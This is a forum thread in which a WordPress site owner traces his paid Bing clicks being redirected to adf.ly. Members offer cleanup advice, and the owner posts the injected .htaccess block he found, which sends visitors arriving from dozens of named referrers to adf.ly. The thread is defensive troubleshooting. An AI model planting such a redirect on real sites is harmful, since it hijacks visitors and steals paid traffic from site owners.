My Bing PPC clicks are being hijacked! Expert help needed.

31 replies
  • SEO
  • |
I am advertising on the Bing search network, tracking my clicks and conversions using prosper 202.
For the past 3 days only around 7% of my clicks are registering in the tracking stats.
Usually all clicks will register in 202.(after a short delay)
It is as if the Bing clicks are being somehow sent elsewhere.
I have had to stop a profitable campaign because at 47c a click I am no longer making money.
If I check the destination URL everything is fine, but if I go to Bing search and click on my own ad an adf.ly page appears.
I would appreciate any help from Warriors.
Thx
#bing #clicks #expert #hijacked #needed #ppc
  • Profile picture of the author Stockbob55
    Update....even when I click on my own signature on this forum it goes to adf.ly instead of my site....
    Signature
    If you are sick of the hype...watch this space!
    [/URL]
    {{ DiscussionBoard.errors[8424945].message }}
  • Profile picture of the author ronrule
    Your sig link loads fine for me, have you run a virus scan? There are malicious browser plugins out there that can be used to target specific sites and redirect traffic elsewhere. If your site is being targeted, it's only affecting people who are infected.

    Some of these are pretty sneaky, they watch your browser activity and if the plugin detects you're logging into AdWords or AdCenter they'll add the domains you're advertising to the list.

    Try running Malwarebytes first and report back your results.
    Signature

    -
    Ron Rule
    http://ronrule.com

    {{ DiscussionBoard.errors[8424951].message }}
    • Profile picture of the author Stockbob55
      Originally Posted by ronrule View Post

      Your sig link loads fine for me, have you run a virus scan? There are malicious browser plugins out there that can be used to target specific sites and redirect traffic elsewhere. If your site is being targeted, it's only affecting people who are infected.

      Some of these are pretty sneaky, they watch your browser activity and if the plugin detects you're logging into AdWords or AdCenter they'll add the domains you're advertising to the list.

      Try running Malwarebytes first and report back your results.
      Thanks I have it running in the background as I type.

      Rob
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8425967].message }}
      • Profile picture of the author Stockbob55
        Scan results:

        Malwarebytes Anti-Malware

        Scan type: Full scan (C:|)
        Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
        Scan options disabled: P2P
        Objects scanned: 449735
        Time elapsed: 1 hour(s), 15 minute(s), 32 second(s)

        No malicious items detected

        (end)
        Off to my php files next
        Signature
        If you are sick of the hype...watch this space!
        [/URL]
        {{ DiscussionBoard.errors[8426113].message }}
        • Profile picture of the author paulgl
          Check all footers and headers, then change your password to something
          monstrous. Even then, they can get through. It's a weakness of all
          sites that have similar coding. Your host should be able to shut it down,
          but many can't or won't. The latest updates for all aspects of servers
          should be installed by any repuatable host. But, sadly, this crap
          still gets through.

          Paul
          Signature

          If you were disappointed in your results today, lower your standards tomorrow.

          {{ DiscussionBoard.errors[8426171].message }}
          • Profile picture of the author Stockbob55
            Checking with Hostgator now....
            Signature
            If you are sick of the hype...watch this space!
            [/URL]
            {{ DiscussionBoard.errors[8426686].message }}
    • Profile picture of the author timpears
      Originally Posted by ronrule View Post

      Your sig link loads fine for me,
      I on the other hand get an adf.ly page that has been suspended.
      Signature

      Tim Pears

      {{ DiscussionBoard.errors[8427245].message }}
      • Profile picture of the author Stockbob55
        Originally Posted by timpears View Post

        I on the other hand get an adf.ly page that has been suspended.
        Thank you , I was beginning to think that I was seeing things!!

        I spoke to my hosting company they said no problem at their end.
        Bing says no problem at their network either.

        I switched my IP address.
        Changed to a new laptop.
        Same issue.

        In fact the last 2 days alone my ad has been clicked on 177 times at 0.49c per click, costing me $87.61 at an average ctr of 1.47, but only 14 of those searchers were sent to my landing page according to my tracking which is very reliable.

        So my question is what happened to the other 163 clicks?
        Signature
        If you are sick of the hype...watch this space!
        [/URL]
        {{ DiscussionBoard.errors[8428756].message }}
        • Profile picture of the author Stockbob55
          I am logging all of this here to help others who may encounter similar problems.
          If it can happen to me then it will surely happen to others.

          When I find the problem, which I will, I will report back here.

          Going to check out my php files.

          thanks to you all
          Rob
          Signature
          If you are sick of the hype...watch this space!
          [/URL]
          {{ DiscussionBoard.errors[8428766].message }}
          • Profile picture of the author RandySwanston
            Even I am being redirected to adfly when I visit your website. I think you index.php page has been hijacked.

            Install the plugin Wordfence from here hxxp://wordpress.org/plugins/wordfence/ and start a website scan, it will scan through all the files and shows you where the problem is. It will help you clean your website without anyone's help. After clearing don't remove the plugin, it will protect your site from future attacks.

            Also check your .htaccess for any error. I had similar issue on one of my wordpress site, I found that the attacker had inserted some code to my htaccess file which was the cause for redirection.

            Block "wp-config.php" file from public access and allow "wp-login.php" only from your IP to be on the safer side.

            Here are the codes:

            <files wp-config.php>
            order allow,deny
            deny from all
            </files>


            <files wp-config.php>
            order allow,deny
            allow from ENTER YOUR IP ADDRESS HERE
            deny from all
            </files>

            Add these codes to your .htaccess file.
            Signature
            {{ DiscussionBoard.errors[8429208].message }}
  • Profile picture of the author svetod
    hi, I think your website has virus.
    Bing has not anything to do with it. I had the same thing in the past, found a doubtful code in all of the php-s on my server and the sites where redirecting to another one. If you are not good in web development, hire someone to find and clear this code for you.
    Signature
    Want To Know How I Make Money Online? Read my story http://affiliate-lifestyle.com/
    Follow me on Instagram for Daily Inspiration & Free Tips: svetlintodd
    {{ DiscussionBoard.errors[8425433].message }}
  • Profile picture of the author vask
    Ahh yeah man, I just scanned your site, you have some malware.

    Sorry, it sucks. It happened to me a couple days ago because I was a stupid and neglected to protect my stuff -_-

    Check your files for weird php files or snippets. I found mine in a couple of my index.php files. Good luck!
    {{ DiscussionBoard.errors[8426964].message }}
    • Profile picture of the author Stockbob55
      Originally Posted by vask View Post

      Ahh yeah man, I just scanned your site, you have some malware.

      Sorry, it sucks. It happened to me a couple days ago because I was a stupid and neglected to protect my stuff -_-

      Check your files for weird php files or snippets. I found mine in a couple of my index.php files. Good luck!
      That is interesting.
      Which site did you scan?
      Thx
      Rob
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8428704].message }}
  • Profile picture of the author svetod
    Sometimes a simple malware scan won't help. Have a look at the source code and search for uncommon code.
    Signature
    Want To Know How I Make Money Online? Read my story http://affiliate-lifestyle.com/
    Follow me on Instagram for Daily Inspiration & Free Tips: svetlintodd
    {{ DiscussionBoard.errors[8427110].message }}
  • Profile picture of the author jovykhan
    Same here. Your website redirects to AdFly.

    I scanned your site through Sucuri and it detected suspicious redirect.

    Suspicious conditional redirect on:
    Kickinit4cash | Make Money Online For Beginners
    Suspicious conditional redirect.
    Details: Sucuri Malware Signatures
    Redirects users to:AdF.ly - Suspended
    Further details: Sucuri Malware Signatures
    Signature
    LocalFinder.net Australia's Leading Online Business Directory
    Australian Local Citation Service
    {{ DiscussionBoard.errors[8429291].message }}
    • Profile picture of the author Stockbob55
      This is the ,htaccess file from the website
      is it normal?
      # BEGIN WordPress
      <IfModule mod_rewrite.c>
      RewriteEngine On
      RewriteBase /
      RewriteRule ^index.php$ - [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      </IfModule>

      # END WordPress
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8430065].message }}
  • Profile picture of the author ronrule
    How is it that I can see the site without it redirecting?
    Signature

    -
    Ron Rule
    http://ronrule.com

    {{ DiscussionBoard.errors[8430197].message }}
    • Profile picture of the author Stockbob55
      Originally Posted by ronrule View Post

      How is it that I can see the site without it redirecting?
      I wish I knew the answer to that, on Bing about 7-8% of clicks go through to my landing page.
      Sometimes I can type in the URL and get to my site but usually not.
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8430893].message }}
  • Profile picture of the author yukon
    Banned
    There's a couple of redirects on the index page, looks like it only kicks in on the 2nd+ visit (cookie?).

    Here's a redirect trace using Firebug on Firefox.

    Search your htaccess file for an ow.ly URL, or use FTP (Filezilla) to look at your WP theme files for either an ow.ly URL or base64 code.




    Signature
    Hi
    {{ DiscussionBoard.errors[8431027].message }}
  • Profile picture of the author yukon
    Banned
    A temporary fix would be to do this:
    1. Login to your wp-admin
    2. Turn off all WP-plugins
    3. Change your theme to the default WP theme
    4. Clear your browser history with CCleaner (free version)
    5. Visit the Index page 2 or 3 times to verify the redirect is gone, or let me know after you've done everything above & I'll run another redirect trace on the Index page with Firebug/Firefox.

    [edit]
    Assumes your htaccess file is ok, check that first.
    Signature
    Hi
    {{ DiscussionBoard.errors[8431071].message }}
    • Profile picture of the author Stockbob55
      Ok I have found it, I was looking in the wrong place.

      I looked at the .htaccess file for my site and didn't see any malicious code.

      It was in the root folder public_html .htaccess file.

      RewriteEngine On
      RewriteOptions inherit
      RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*yahoo.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*facebook.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*fb\.me.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*twitter.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*live.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*gmail.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*paypal.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*digg.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*reddit.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*baidu.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*hotmail.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*amazon.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*pinterest.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*stumbleupon.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*bit.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*goo.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*adf.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*tinyurl.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*t\.co.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*excite.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ask.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*aol.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*outlook.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*vince.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*jvzoo.* [NC]
      RewriteCond %{HTTP_REFERER} .*black.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ebay.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*tube.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*microsoft.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*huffingtonpost.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*wordpress.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*wikipedia.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*answers.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*linkedin.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ehow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*blog.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*craig.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*adobe.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*cnn.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*wow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*yellow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*vimeo.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*news.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*daily.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*yelp.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*imgur.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*photobucket.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*apple.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*webmd.* [NC,OR]
      RewriteRule .* AdF.ly - Suspended [R=301,L]
      # BEGIN WordPress
      <IfModule mod_rewrite.c>
      RewriteEngine On
      RewriteBase /
      RewriteRule ^index.php$ - [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      </IfModule>
      # END WordPress
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8432101].message }}
    • Profile picture of the author Stockbob55
      Originally Posted by yukon View Post

      A temporary fix would be to do this:
      1. Login to your wp-admin
      2. Turn off all WP-plugins
      3. Change your theme to the default WP theme
      4. Clear your browser history with CCleaner (free version)
      5. Visit the Index page 2 or 3 times to verify the redirect is gone, or let me know after you've done everything above & I'll run another redirect trace on the Index page with Firebug/Firefox.
      [edit]
      Assumes your htaccess file is ok, check that first.
      I have deleted the code in the .htaccess file and carried out the above instructions. Still redirecting here.
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8432153].message }}
      • Profile picture of the author yukon
        Banned
        Originally Posted by Stockbob55 View Post

        I have deleted the code in the .htaccess file and carried out the above instructions. Still redirecting here.
        I clicked your forum sig. link 5 times & your index page loads fine for me, no redirects.

        Make sure your browser history is cleared, you might have an adf.ly cookie, or WP cache is messing with you?

        I use CCleaner (free version).
        Signature
        Hi
        {{ DiscussionBoard.errors[8432631].message }}
  • Profile picture of the author dcary13
    Well, thats fine you are removed it.

    The problem is that you simply miss the basic knowledge to handle it.

    You have no idea how they did it, right?

    Which means the backdoor is still there, you server will be hijacked soon again and so on.

    You need help from someone and that persons must investigate your whole installation.
    And close the backdoor of course.
    {{ DiscussionBoard.errors[8432718].message }}
    • Profile picture of the author yukon
      Banned
      Originally Posted by dcary13 View Post

      Well, thats fine you are removed it.

      The problem is that you simply miss the basic knowledge to handle it.

      You have no idea how they did it, right?

      Which means the backdoor is still there, you server will be hijacked soon again and so on.

      You need help from someone and that persons must investigate your whole installation.
      And close the backdoor of course.
      OP said he disabled the WP plugins & switched back to the default WP theme, the OP forum sig./link no longer redirects to adf.ly on/after the 2nd click on the forum sig. link.

      It was most likely the usual stuff, either a free WP theme or a free WP plugin that was hacked before it was ever uploaded to the OPs server/host.

      Related link: How to check your site for base64 links
      Signature
      Hi
      {{ DiscussionBoard.errors[8432732].message }}
      • Profile picture of the author Stockbob55
        Originally Posted by yukon View Post

        OP said he disabled the WP plugins & switched back to the default WP theme, the OP forum sig./link no longer redirects to adf.ly on/after the 2nd click on the forum sig. link.

        It was most likely the usual stuff, either a free WP theme or a free WP plugin that was hacked before it was ever uploaded to the OPs server/host.

        Related link: How to check your site for base64 links
        Thanks for the useful link.

        I am trying to track down the source of the problem, partly because I don't want to make the same mistake again but also because the infected file may still be on my computer.
        The last change to my .htaccess file was on 7/29 so I will start there by looking at any downloads.
        Signature
        If you are sick of the hype...watch this space!
        [/URL]
        {{ DiscussionBoard.errors[8436016].message }}
        • Profile picture of the author RandySwanston
          Originally Posted by Stockbob55 View Post

          Thanks for the useful link.

          I am trying to track down the source of the problem, partly because I don't want to make the same mistake again but also because the infected file may still be on my computer.
          The last change to my .htaccess file was on 7/29 so I will start there by looking at any downloads.
          I suggest you re-install your WP core files (only core files not the entire WP), you may not know, but there might be some changes made even to the core files. So its better to be on the safer side. Ask your hosting provider to check out from their end, because the malware might have come through your hosting server.
          Signature
          {{ DiscussionBoard.errors[8438212].message }}
    • Profile picture of the author Stockbob55
      Originally Posted by dcary13 View Post

      Well, thats fine you are removed it.

      The problem is that you simply miss the basic knowledge to handle it.

      You have no idea how they did it, right?

      Which means the backdoor is still there, you server will be hijacked soon again and so on.

      You need help from someone and that persons must investigate your whole installation.
      And close the backdoor of course.
      Yes, I understand what you are saying and I have had a crash course in basic knowledge over the last few days to be sure.
      This incident has caused me to re examine the possible wordpress vulnerabilities and learn some more about protecting my websites.
      Thanks for your help
      Signature
      If you are sick of the hype...watch this space!
      [/URL]
      {{ DiscussionBoard.errors[8434584].message }}
  • Profile picture of the author TwinkleToes
    It seems that you have malware! Get a virus scan done and check for new updates. There are some notorious plugins that may be the cause and check them as well. Bing is not your problem and it is not targeting your site. There are a few checks you should do and so get down to them right away. There can also be an error in the coding of your website and so you can check it. In case you do not have the expertise you can get help from professionals who will do is for you at a nominal cost. Now if you really wish to make your site proof free ensure you have a password that is alpha numeric. This makes it hard for hackers to crack and protects your site from unauthorized access
    Signature
    Ask...Because you never stop learning.
    {{ DiscussionBoard.errors[8434740].message }}
  • It is problem with Prosper 202 and now with Bing.

    I have similar problems. Prosper is a FREE tool and has challenges with support. It is tough to understand how to work on it until i got a course on it and it helped me a lot
    {{ DiscussionBoard.errors[8461158].message }}

Trending Topics